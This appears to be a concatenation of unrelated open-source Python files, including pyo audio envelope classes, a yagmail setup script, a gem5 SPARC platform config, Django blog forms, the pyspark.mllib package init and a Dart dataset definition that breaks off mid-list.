"""
Replace the `fadeout` attribute.
:Args:
x : float
new `fadeout` attribute.
"""
pyoArgsAssert(self, "n", x)
self._fadeout = x
x, lmax = convertArgsToLists(x)
[obj.setFadeout(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setDur(self, x):
"""
Replace the `dur` attribute.
:Args:
x : float
new `dur` attribute.
"""
pyoArgsAssert(self, "n", x)
self._dur = x
x, lmax = convertArgsToLists(x)
[obj.setDur(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def ctrl(self, map_list=None, title=None, wxnoserver=False):
self._map_list = [SLMap(0, 10., 'lin', 'fadein', self._fadein, dataOnly=True),
SLMap(0, 10., 'lin', 'fadeout', self._fadeout, dataOnly=True),
SLMap(0, 20., 'lin', 'dur', self._dur, dataOnly=True)]
PyoObject.ctrl(self, map_list, title, wxnoserver)
@property
def fadein(self):
"""float. Rising time of the envelope in seconds."""
return self._fadein
@fadein.setter
def fadein(self, x): self.setFadein(x)
@property
def fadeout(self):
"""float. Falling time of the envelope in seconds."""
return self._fadeout
@fadeout.setter
def fadeout(self, x): self.setFadeout(x)
@property
def dur(self):
"""float. Total duration of the envelope."""
return self._dur
@dur.setter
def dur(self, x): self.setDur(x)
class Adsr(PyoObject):
"""
Attack - Decay - Sustain - Release envelope generator.
Calculates the classical ADSR envelope using linear segments.
Duration can be set to 0 to give an infinite sustain. In this
case, the stop() method calls the envelope release part.
The play() method starts the envelope and is not called at the
object creation time.
:Parent: :py:class:`PyoObject`
:Args:
attack : float, optional
Duration of the attack phase in seconds. Defaults to 0.01.
decay : float, optional
Duration of the decay in seconds. Defaults to 0.05.
sustain : float, optional
Amplitude of the sustain phase. Defaults to 0.707.
release : float, optional
Duration of the release in seconds. Defaults to 0.1.
dur : float, optional
Total duration of the envelope. Defaults to 0, which means wait
for the stop() method to start the release phase.
.. note::
The out() method is bypassed. Adsr's signal can not be sent to audio outs.
The play() method starts the envelope.
The stop() calls the envelope's release phase if `dur` = 0.
>>> s = Server().boot()
>>> s.start()
>>> f = Adsr(attack=.01, decay=.2, sustain=.5, release=.1, dur=2, mul=.5)
>>> a = BrownNoise(mul=f).mix(2).out()
>>> def repeat():
... f.play()
>>> pat = Pattern(function=repeat, time=2).play()
"""
def __init__(self, attack=0.01, decay=0.05, sustain=0.707, release=0.1, dur=0, mul=1, add=0):
pyoArgsAssert(self, "nnnnnOO", attack, decay, sustain, release, dur, mul, add)
PyoObject.__init__(self, mul, add)
self._attack = attack
self._decay = decay
self._sustain = sustain
self._release = release
self._dur = dur
attack, decay, sustain, release, dur, mul, add, lmax = convertArgsToLists(attack, decay, sustain, release, dur, mul, add)
self._base_objs = [Adsr_base(wrap(attack,i), wrap(decay,i), wrap(sustain,i), wrap(release,i), wrap(dur,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
def out(self, chnl=0, inc=1, dur=0, delay=0):
return self.play(dur, delay)
def setAttack(self, x):
"""
Replace the `attack` attribute.
:Args:
x : float
new `attack` attribute.
"""
pyoArgsAssert(self, "n", x)
self._attack = x
x, lmax = convertArgsToLists(x)
[obj.setAttack(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setDecay(self, x):
"""
Replace the `decay` attribute.
:Args:
x : float
new `decay` attribute.
"""
pyoArgsAssert(self, "n", x)
self._decay = x
x, lmax = convertArgsToLists(x)
[obj.setDecay(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setSustain(self, x):
"""
Replace the `sustain` attribute.
:Args:
x : float
new `sustain` attribute.
"""
pyoArgsAssert(self, "n", x)
self._sustain = x
x, lmax = convertArgsToLists(x)
[obj.setSustain(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setRelease(self, x):
"""
Replace the `sustain` attribute.
:Args:
x : float
new `sustain` attribute.
"""
pyoArgsAssert(self, "n", x)
self._release = x
x, lmax = convertArgsToLists(x)
[obj.setRelease(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setDur(self, x):
"""
Replace the `dur` attribute.
:Args:
x : float
new `dur` attribute.
"""
pyoArgsAssert(self, "n", x)
self._dur = x
x, lmax = convertArgsToLists(x)
[obj.setDur(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def ctrl(self, map_list=None, title=None, wxnoserver=False):
self._map_list = [SLMap(0, 5, 'lin', 'attack', self._attack, dataOnly=True),
SLMap(0, 5, 'lin', 'decay', self._decay, dataOnly=True),
SLMap(0, 1, 'lin', 'sustain', self._sustain, dataOnly=True),
SLMap(0, 10, 'lin', 'release', self._release, dataOnly=True),
SLMap(0, 20., 'lin', 'dur', self._dur, dataOnly=True)]
PyoObject.ctrl(self, map_list, title, wxnoserver)
@property
def attack(self):
"""float. Duration of the attack phase in seconds."""
return self._attack
@attack.setter
def attack(self, x): self.setAttack(x)
@property
def decay(self):
"""float. Duration of the decay phase in seconds."""
return self._decay
@decay.setter
def decay(self, x): self.setDecay(x)
@property
def sustain(self):
"""float. Amplitude of the sustain phase."""
return self._sustain
@sustain.setter
def sustain(self, x): self.setSustain(x)
@property
def release(self):
"""float. Duration of the release phase in seconds."""
return self._release
@release.setter
def release(self, x): self.setRelease(x)
@property
def dur(self):
"""float. Total duration of the envelope."""
return self._dur
@dur.setter
def dur(self, x): self.setDur(x)
class Linseg(PyoObject):
"""
Trace a series of line segments between specified break-points.
The play() method starts the envelope and is not called at the
object creation time.
:Parent: :py:class:`PyoObject`
:Args:
list : list of tuples
Points used to construct the line segments. Each tuple is a
new point in the form (time, value).
Times are given in seconds and must be in increasing order.
loop : boolean, optional
Looping mode. Defaults to False.
initToFirstVal : boolean, optional
If True, audio buffer will be filled at initialization with the
first value of the line. Defaults to False.
.. note::
The out() method is bypassed. Linseg's signal can not be sent to audio outs.
>>> s = Server().boot()
>>> s.start()
>>> l = Linseg([(0,500),(.03,1000),(.1,700),(1,500),(2,500)], loop=True)
>>> a = Sine(freq=l, mul=.3).mix(2).out()
>>> # then call:
>>> l.play()
"""
def __init__(self, list, loop=False, initToFirstVal=False, mul=1, add=0):
pyoArgsAssert(self, "lbbOO", list, loop, initToFirstVal, mul, add)
PyoObject.__init__(self, mul, add)
self._list = list
self._loop = loop
initToFirstVal, loop, mul, add, lmax = convertArgsToLists(initToFirstVal, loop, mul, add)
if type(list[0]) != ListType:
self._base_objs = [Linseg_base(list, wrap(loop,i), wrap(initToFirstVal,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
else:
listlen = len(list)
lmax = max(listlen, lmax)
self._base_objs = [Linseg_base(wrap(list,i), wrap(loop,i), wrap(initToFirstVal,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
def out(self, chnl=0, inc=1, dur=0, delay=0):
return self.play(dur, delay)
def setList(self, x):
"""
Replace the `list` attribute.
:Args:
x : list of tuples
new `list` attribute.
"""
pyoArgsAssert(self, "l", x)
self._list = x
if type(x[0]) != ListType:
[obj.setList(x) for i, obj in enumerate(self._base_objs)]
else:
[obj.setList(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def replace(self, x):
"""
Alias for `setList` method.
:Args:
x : list of tuples
new `list` attribute.
"""
self.setList(x)
def getPoints(self):
return self._list
def setLoop(self, x):
"""
Replace the `loop` attribute.
:Args:
x : boolean
new `loop` attribute.
"""
pyoArgsAssert(self, "b", x)
self._loop = x
x, lmax = convertArgsToLists(x)
[obj.setLoop(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def graph(self, xlen=None, yrange=None, title=None, wxnoserver=False):
"""
Opens a grapher window to control the shape of the envelope.
When editing the grapher with the mouse, the new set of points
will be send to the object on mouse up.
Ctrl+C with focus on the grapher will copy the list of points to the
clipboard, giving an easy way to insert the new shape in a script.
:Args:
xlen : float, optional
Set the maximum value of the X axis of the graph. If None, the
maximum value is retrieve from the current list of points.
yrange : tuple, optional
Set the min and max values of the Y axis of the graph. If
None, min and max are retrieve from the current list of points.
title : string, optional
Title of the window. If none is provided, the name of the
class is used.
wxnoserver : boolean, optional
With wxPython graphical toolkit, if True, tells the
interpreter that there will be no server window.
If `wxnoserver` is set to True, the interpreter will not wait for the
server GUI before showing the controller window.
"""
if xlen == None:
xlen = float(self._list[-1][0])
else:
xlen = float(xlen)
if yrange == None:
ymin = float(min([x[1] for x in self._list]))
ymax = float(max([x[1] for x in self._list]))
if ymin == ymax:
yrange = (0, ymax)
else:
yrange = (ymin, ymax)
createGraphWindow(self, 0, xlen, yrange, title, wxnoserver)
@property
def list(self):
"""float. List of points (time, value)."""
return self._list
@list.setter
def list(self, x): self.setList(x)
@property
def loop(self):
"""boolean. Looping mode."""
return self._loop
@loop.setter
def loop(self, x): self.setLoop(x)
class Expseg(PyoObject):
"""
Trace a series of exponential segments between specified break-points.
The play() method starts the envelope and is not called at the
object creation time.
:Parent: :py:class:`PyoObject`
:Args:
list : list of tuples
Points used to construct the line segments. Each tuple is a
new point in the form (time, value).
Times are given in seconds and must be in increasing order.
loop : boolean, optional
Looping mode. Defaults to False.
exp : float, optional
Exponent factor. Used to control the slope of the curves.
Defaults to 10.
inverse : boolean, optional
If True, downward slope will be inversed. Useful to create
biexponential curves. Defaults to True.
initToFirstVal : boolean, optional
If True, audio buffer will be filled at initialization with the
first value of the line. Defaults to False.
.. note::
The out() method is bypassed. Expseg's signal can not be sent to audio outs.
>>> s = Server().boot()
>>> s.start()
>>> l = Expseg([(0,500),(.03,1000),(.1,700),(1,500),(2,500)], loop=True)
>>> a = Sine(freq=l, mul=.3).mix(2).out()
>>> # then call:
>>> l.play()
"""
def __init__(self, list, loop=False, exp=10, inverse=True, initToFirstVal=False, mul=1, add=0):
pyoArgsAssert(self, "lbnbbOO", list, loop, exp, inverse, initToFirstVal, mul, add)
PyoObject.__init__(self, mul, add)
self._list = list
self._loop = loop
self._exp = exp
self._inverse = inverse
loop, exp, inverse, initToFirstVal, mul, add, lmax = convertArgsToLists(loop, exp, inverse, initToFirstVal, mul, add)
if type(list[0]) != ListType:
self._base_objs = [Expseg_base(list, wrap(loop,i), wrap(exp,i), wrap(inverse,i), wrap(initToFirstVal,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
else:
listlen = len(list)
lmax = max(listlen, lmax)
self._base_objs = [Expseg_base(wrap(list,i), wrap(loop,i), wrap(exp,i), wrap(inverse,i), wrap(initToFirstVal,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
def out(self, chnl=0, inc=1, dur=0, delay=0):
return self.play(dur, delay)
def setList(self, x):
"""
Replace the `list` attribute.
:Args:
x : list of tuples
new `list` attribute.
"""
pyoArgsAssert(self, "l", x)
self._list = x
if type(x[0]) != ListType:
[obj.setList(x) for i, obj in enumerate(self._base_objs)]
else:
[obj.setList(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setLoop(self, x):
"""
Replace the `loop` attribute.
:Args:
x : boolean
new `loop` attribute.
"""
pyoArgsAssert(self, "b", x)
self._loop = x
x, lmax = convertArgsToLists(x)
[obj.setLoop(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setExp(self, x):
"""
Replace the `exp` attribute.
:Args:
x : float
new `exp` attribute.
"""
pyoArgsAssert(self, "n", x)
self._exp = x
x, lmax = convertArgsToLists(x)
[obj.setExp(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setInverse(self, x):
"""
Replace the `inverse` attribute.
:Args:
x : boolean
new `inverse` attribute.
"""
pyoArgsAssert(self, "b", x)
self._inverse = x
x, lmax = convertArgsToLists(x)
[obj.setInverse(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def replace(self, x):
"""
Alias for `setList` method.
:Args:
x : list of tuples
new `list` attribute.
"""
self.setList(x)
def getPoints(self):
return self._list
def graph(self, xlen=None, yrange=None, title=None, wxnoserver=False):
"""
Opens a grapher window to control the shape of the envelope.
When editing the grapher with the mouse, the new set of points
will be send to the object on mouse up.
Ctrl+C with focus on the grapher will copy the list of points to the
clipboard, giving an easy way to insert the new shape in a script.
:Args:
xlen : float, optional
Set the maximum value of the X axis of the graph. If None, the
maximum value is retrieve from the current list of points.
Defaults to None.
yrange : tuple, optional
Set the min and max values of the Y axis of the graph. If
None, min and max are retrieve from the current list of points.
Defaults to None.
title : string, optional
Title of the window. If none is provided, the name of the
class is used.
wxnoserver : boolean, optional
With wxPython graphical toolkit, if True, tells the
interpreter that there will be no server window.
If `wxnoserver` is set to True, the interpreter will not wait for the
server GUI before showing the controller window.
"""
if xlen == None:
xlen = float(self._list[-1][0])
else:
xlen = float(xlen)
if yrange == None:
ymin = float(min([x[1] for x in self._list]))
ymax = float(max([x[1] for x in self._list]))
if ymin == ymax:
yrange = (0, ymax)
else:
yrange = (ymin, ymax)
createGraphWindow(self, 2, xlen, yrange, title, wxnoserver)
@property
def list(self):
"""float. List of points (time, value)."""
return self._list
@list.setter
def list(self, x): self.setList(x)
@property
def loop(self):
"""boolean. Looping mode."""
return self._loop
@loop.setter
def loop(self, x): self.setLoop(x)
@property
def exp(self):
"""float. Exponent factor."""
return self._exp
@exp.setter
def exp(self, x): self.setExp(x)
@property
def inverse(self):
"""boolean. Inverse downward slope."""
return self._inverse
@inverse.setter
def inverse(self, x): self.setInverse(x)
class SigTo(PyoObject):
"""
Convert numeric value to PyoObject signal with portamento.
When `value` is changed, a ramp is applied from the current
value to the new value. Can be used with PyoObject to apply
a linear portamento on an audio signal.
:Parent: :py:class:`PyoObject`
:Args:
value : float or PyoObject
Numerical value to convert.
time : float, optional
Ramp time, in seconds, to reach the new value. Defaults to 0.025.
init : float, optional
Initial value of the internal memory. Defaults to 0.
.. note::
The out() method is bypassed. SigTo's signal can not be sent to audio outs.
>>> import random
>>> s = Server().boot()
>>> s.start()
>>> fr = SigTo(value=200, time=0.5, init=200)
>>> a = SineLoop(freq=fr, feedback=0.08, mul=.3).out()
>>> b = SineLoop(freq=fr*1.005, feedback=0.08, mul=.3).out(1)
>>> def pick_new_freq():
... fr.value = random.randrange(200,501,50)
>>> pat = Pattern(function=pick_new_freq, time=1).play()
"""
def __init__(self, value, time=0.025, init=0.0, mul=1, add=0):
pyoArgsAssert(self, "OnnOO", value, time, init, mul, add)
PyoObject.__init__(self, mul, add)
self._value = value
self._time = time
value, time, init, mul ,add, lmax = convertArgsToLists(value, time, init, mul, add)
self._base_objs = [SigTo_base(wrap(value,i), wrap(time,i), wrap(init,i), wrap(mul,i), wrap(add,i)) for i in range(lmax)]
def setValue(self, x):
"""
Changes the value of the signal stream.
:Args:
x : float or PyoObject
Numerical value to convert.
"""
pyoArgsAssert(self, "O", x)
self._value = x
x, lmax = convertArgsToLists(x)
[obj.setValue(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def setTime(self, x):
"""
Changes the ramp time of the object.
:Args:
x : float
New ramp time.
"""
pyoArgsAssert(self, "n", x)
self._time = x
x, lmax = convertArgsToLists(x)
[obj.setTime(wrap(x,i)) for i, obj in enumerate(self._base_objs)]
def ctrl(self, map_list=None, title=None, wxnoserver=False):
self._map_list = [SLMap(0, 10, 'lin', 'time', self._time, dataOnly=True)]
PyoObject.ctrl(self, map_list, title, wxnoserver)
@property
def value(self):
"""float or PyoObject. Numerical value to convert."""
return self._value
@value.setter
def value(self, x): self.setValue(x)
@property
def time(self):
"""float. Ramp time."""
return self._time
@time.setter
def time(self, x): self.setTime(x) | gpl-3.0 |
kootenpv/yagmail | setup.py | 1 | 2037 | from setuptools import setup
from setuptools import find_packages
with open('README.rst') as f:
LONG_DESCRIPTION = f.read()
MAJOR_VERSION = '0'
MINOR_VERSION = '14'
MICRO_VERSION = '247'
VERSION = "{}.{}.{}".format(MAJOR_VERSION, MINOR_VERSION, MICRO_VERSION)
setup(
name='yagmail',
version=VERSION,
description='Yet Another GMAIL client',
long_description=LONG_DESCRIPTION,
url='https://github.com/kootenpv/yagmail',
author='Pascal van Kooten',
author_email='[email protected]',
license='MIT',
extras_require={"all": ["keyring"]},
install_requires=["premailer"],
keywords='email mime automatic html attachment',
entry_points={'console_scripts': ['yagmail = yagmail.__main__:main']},
classifiers=[
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: Customer Service',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Operating System :: Microsoft',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Unix',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Communications :: Email',
'Topic :: Communications :: Email :: Email Clients (MUA)',
'Topic :: Software Development',
'Topic :: Software Development :: Build Tools',
'Topic :: Software Development :: Debuggers',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: System :: Software Distribution',
'Topic :: System :: Systems Administration',
'Topic :: Utilities',
],
packages=find_packages(),
zip_safe=False,
platforms='any',
)
| mit |
jtyuan/racetrack | src/dev/sparc/T1000.py | 66 | 5810 | # Copyright (c) 2006-2007 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
from m5.params import *
from m5.proxy import *
from Device import BasicPioDevice, PioDevice, IsaFake, BadAddr
from Platform import Platform
from Terminal import Terminal
from Uart import Uart8250
class MmDisk(BasicPioDevice):
type = 'MmDisk'
cxx_header = "dev/sparc/mm_disk.hh"
image = Param.DiskImage("Disk Image")
pio_addr = 0x1F40000000
class DumbTOD(BasicPioDevice):
type = 'DumbTOD'
cxx_header = "dev/sparc/dtod.hh"
time = Param.Time('01/01/2009', "System time to use ('Now' for real time)")
pio_addr = 0xfff0c1fff8
class Iob(PioDevice):
type = 'Iob'
cxx_header = "dev/sparc/iob.hh"
platform = Param.Platform(Parent.any, "Platform this device is part of.")
pio_latency = Param.Latency('1ns', "Programed IO latency")
class T1000(Platform):
type = 'T1000'
cxx_header = "dev/sparc/t1000.hh"
system = Param.System(Parent.any, "system")
fake_clk = IsaFake(pio_addr=0x9600000000, pio_size=0x100000000)
#warn_access="Accessing Clock Unit -- Unimplemented!")
fake_membnks = IsaFake(pio_addr=0x9700000000, pio_size=16384,
ret_data64=0x0000000000000000, update_data=False)
#warn_access="Accessing Memory Banks -- Unimplemented!")
fake_jbi = IsaFake(pio_addr=0x8000000000, pio_size=0x100000000)
#warn_access="Accessing JBI -- Unimplemented!")
fake_l2_1 = IsaFake(pio_addr=0xA900000000, pio_size=0x8,
ret_data64=0x0000000000000001, update_data=True)
#warn_access="Accessing L2 Cache Banks -- Unimplemented!")
fake_l2_2 = IsaFake(pio_addr=0xA900000040, pio_size=0x8,
ret_data64=0x0000000000000001, update_data=True)
#warn_access="Accessing L2 Cache Banks -- Unimplemented!")
fake_l2_3 = IsaFake(pio_addr=0xA900000080, pio_size=0x8,
ret_data64=0x0000000000000001, update_data=True)
#warn_access="Accessing L2 Cache Banks -- Unimplemented!")
fake_l2_4 = IsaFake(pio_addr=0xA9000000C0, pio_size=0x8,
ret_data64=0x0000000000000001, update_data=True)
#warn_access="Accessing L2 Cache Banks -- Unimplemented!")
fake_l2esr_1 = IsaFake(pio_addr=0xAB00000000, pio_size=0x8,
ret_data64=0x0000000000000000, update_data=True)
#warn_access="Accessing L2 ESR Cache Banks -- Unimplemented!")
fake_l2esr_2 = IsaFake(pio_addr=0xAB00000040, pio_size=0x8,
ret_data64=0x0000000000000000, update_data=True)
#warn_access="Accessing L2 ESR Cache Banks -- Unimplemented!")
fake_l2esr_3 = IsaFake(pio_addr=0xAB00000080, pio_size=0x8,
ret_data64=0x0000000000000000, update_data=True)
#warn_access="Accessing L2 ESR Cache Banks -- Unimplemented!")
fake_l2esr_4 = IsaFake(pio_addr=0xAB000000C0, pio_size=0x8,
ret_data64=0x0000000000000000, update_data=True)
#warn_access="Accessing L2 ESR Cache Banks -- Unimplemented!")
fake_ssi = IsaFake(pio_addr=0xff00000000, pio_size=0x10000000)
#warn_access="Accessing SSI -- Unimplemented!")
hterm = Terminal()
hvuart = Uart8250(pio_addr=0xfff0c2c000)
htod = DumbTOD()
pterm = Terminal()
puart0 = Uart8250(pio_addr=0x1f10000000)
iob = Iob()
# Attach I/O devices that are on chip
def attachOnChipIO(self, bus):
self.iob.pio = bus.master
self.htod.pio = bus.master
# Attach I/O devices to specified bus object. Can't do this
# earlier, since the bus object itself is typically defined at the
# System level.
def attachIO(self, bus):
self.hvuart.terminal = self.hterm
self.puart0.terminal = self.pterm
self.fake_clk.pio = bus.master
self.fake_membnks.pio = bus.master
self.fake_l2_1.pio = bus.master
self.fake_l2_2.pio = bus.master
self.fake_l2_3.pio = bus.master
self.fake_l2_4.pio = bus.master
self.fake_l2esr_1.pio = bus.master
self.fake_l2esr_2.pio = bus.master
self.fake_l2esr_3.pio = bus.master
self.fake_l2esr_4.pio = bus.master
self.fake_ssi.pio = bus.master
self.fake_jbi.pio = bus.master
self.puart0.pio = bus.master
self.hvuart.pio = bus.master
| bsd-3-clause |
NadaBayoumy/DjangoPythonBlog | Blog/BlogApp/forms.py | 1 | 2667 | #nada
from django import forms
from .models import Category
from .models import ForbiddenWords
from .models import Post
from django import forms
#end nada
#alem
from .models import Post, Reply
#end alem
#hossam
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
#end hossam
#simona
from django.forms.widgets import Widget
from django.contrib.auth.forms import UserCreationForm
#end simona
#nada
class CategoryForm(forms.ModelForm):
class Meta:
model=Category
fields=('categoryName',)
class ForbiddenWordsForm(forms.ModelForm):
class Meta:
model=ForbiddenWords
fields=('forbiddenWord',)
class PostForm(forms.ModelForm):
class Meta:
model=Post
fields=('postTitle','postPic','postContent','userID','postCategory')
#endnada
#alem
class Post_Form(forms.ModelForm):
class Meta:
model = Post
fields = ('postTitle', 'postPic', 'postContent')#'userID', 'postCategory')
class Comment_Form(forms.ModelForm):
class Meta:
model = Reply
fields = ('replyContent',)
#end alem
#hossam
class CreateUserForm(UserCreationForm):
class Meta:
model = User
fields = ('username', 'first_name', 'last_name', 'email', 'password1', 'password2', 'is_staff', 'is_active', 'is_superuser')
class EditUserForm(forms.ModelForm):
class Meta:
model = User
fields = ('username', 'first_name', 'last_name', 'email', 'is_staff', 'is_active', 'is_superuser')
class ChangePwForm(UserCreationForm):
username = forms.CharField(widget=forms.TextInput(attrs={'readonly': 'readonly'}), help_text="This is a disabled field.")
class Meta:
model = User
fields = ('username', 'password1', 'password2')
#end hossam
#simona
class RegistrationForm(UserCreationForm):
class Meta:
model =User
fields=['username','email','first_name','last_name','password1', 'password2']
def clean_email(self):
clean_data = super(RegistrationForm, self).clean()
email=clean_data.get('email')
if User.objects.filter(email=email).count() > 0:
raise forms.ValidationError("this email is already in use")
print("clean_email")
return email
def clean_username(self):
clean_data = super(RegistrationForm, self).clean()
name=clean_data.get('username')
return name
#end simona
| gpl-2.0 |
bravo-zhang/spark | python/pyspark/mllib/__init__.py | 123 | 1412 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
RDD-based machine learning APIs for Python (in maintenance mode).
The `pyspark.mllib` package is in maintenance mode as of the Spark 2.0.0 release to encourage
migration to the DataFrame-based APIs under the `pyspark.ml` package.
"""
from __future__ import absolute_import
# MLlib currently needs NumPy 1.4+, so complain if lower
import numpy
ver = [int(x) for x in numpy.version.version.split('.')[:2]]
if ver < [1, 4]:
raise Exception("MLlib requires NumPy 1.4+")
__all__ = ['classification', 'clustering', 'feature', 'fpm', 'linalg', 'random',
'recommendation', 'regression', 'stat', 'tree', 'util']
| apache-2.0 |
RetailMeNotSandbox/dart | src/python/dart/client/python/examples/datasets/owen_outclick_us_v02.py | 1 | 14227 | from dart.client.python.dart_client import Dart
from dart.model.dataset import Column, DatasetData, Dataset, DataFormat, FileFormat, RowFormat, DataType, Compression, \
LoadType
if __name__ == '__main__':
dart = Dart('localhost', 5000)
assert isinstance(dart, Dart)
dataset = dart.save_dataset(Dataset(data=(DatasetData(
name='owen_outclick_us_v02',
description='Owen outclick data, based on overlord schema version. Considered a replacement for outclick events.',
table_name='outclick',
location='s3://example-bucket/prd/inbound/overlord/raw-firehose-02/rmn-outclicks',
load_type=LoadType.MERGE,
data_format=DataFormat(
file_format=FileFormat.TEXTFILE,
row_format=RowFormat.JSON,
),
compression=Compression.GZIP,
partitions=[
Column('year', DataType.STRING),
Column('month', DataType.STRING),
Column('day', DataType.STRING),
],
primary_keys=['eventInstanceUuid'],
merge_keys=['eventInstanceUuid'],
sort_keys=['eventTimestamp', 'eventInstanceUuid', 'derivedEventInstanceId'],
distribution_keys=['eventInstanceUuid'],
batch_merge_sort_keys=['owenProcessed DESC'],
columns=[
Column('advertiserUuid', DataType.VARCHAR, length=2048, path='owen.context.advertiserUuid'),
Column('appBadgeCount', DataType.INT, path='owen.context.appBadgeCount'),
Column('appForegroundFlag', DataType.BOOLEAN, path='owen.context.appForegroundFlag'),
Column('bluetoothBeaconId', DataType.VARCHAR, length=50, path='owen.context.bluetoothBeaconId'),
Column('bluetoothBeaconType', DataType.VARCHAR, length=25, path='owen.context.bluetoothBeaconType'),
Column('bluetoothEnabledFlag', DataType.BOOLEAN, path='owen.context.bluetoothEnabledFlag'),
Column('breadCrumb', DataType.VARCHAR, length=2048, path='owen.context.breadCrumb'),
Column('browserFamily', DataType.VARCHAR, length=50, path='owen.context.browserFamily'),
Column('browserVersion', DataType.VARCHAR, length=50, path='owen.context.browserVersion'),
Column('carrier', DataType.VARCHAR, length=25, path='owen.context.carrier'),
Column('city', DataType.VARCHAR, length=75, path='owen.context.city'),
Column('connectionType', DataType.VARCHAR, length=25, path='owen.context.connectionType'),
Column('country', DataType.VARCHAR, length=2, path='owen.context.country'),
Column('custom', DataType.VARCHAR, path='owen.context.custom'),
Column('deviceCategory', DataType.VARCHAR, length=2048, path='owen.context.deviceCategory'),
Column('deviceFingerprint', DataType.VARCHAR, length=26, path='owen.context.deviceFingerprint'),
Column('dma', DataType.INT, path='owen.context.dma'),
Column('environment', DataType.VARCHAR, length=2048, path='owen.context.environment'),
Column('experimentObject', DataType.VARCHAR, length=1024, path='owen.context.experiment'),
Column('failureFlag', DataType.BOOLEAN, path='owen.context.failureFlag'),
Column('failureReason', DataType.VARCHAR, length=2048, path='owen.context.failureReason'),
Column('favoriteFlag', DataType.BOOLEAN, path='owen.context.favoriteFlag'),
Column('featureFlags', DataType.VARCHAR, path='owen.context.featureFlags'),
Column('geofenceUuid', DataType.VARCHAR, length=2048, path='owen.context.geofenceUuid'),
Column('inventoryCount', DataType.INT, path='owen.context.inventoryCount'),
Column('inventory_affiliateNetwork', DataType.VARCHAR, length=50, path='owen.context.inventory[0].affiliateNetwork'),
Column('inventory_brand', DataType.VARCHAR, length=100, path='owen.context.inventory[0].brand'),
Column('inventory_claimUuid', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].claimUuid'),
Column('inventory_clickLocation', DataType.VARCHAR, length=100, path='owen.context.inventory[0].clickLocation'),
Column('inventory_commentsCount', DataType.INT, path='owen.context.inventory[0].commentsCount'),
Column('inventory_conquestingFlag', DataType.BOOLEAN, path='owen.context.inventory[0].conquestingFlag'),
Column('inventory_couponRank', DataType.NUMERIC, precision=18, scale=4, path='owen.context.inventory[0].couponRank'),
Column('inventory_deepLinkUrl', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].deepLinkUrl'),
Column('inventory_deepLinkUrlScheme', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].deepLinkUrlScheme'),
Column('inventory_exclusivityFlag', DataType.BOOLEAN, path='owen.context.inventory[0].exclusivityFlag'),
Column('inventory_expirationDate', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].expirationDate'),
Column('inventory_finalPrice', DataType.NUMERIC, precision=18, scale=4, path='owen.context.inventory[0].finalPrice'),
Column('inventory_instoreType', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].instoreType'),
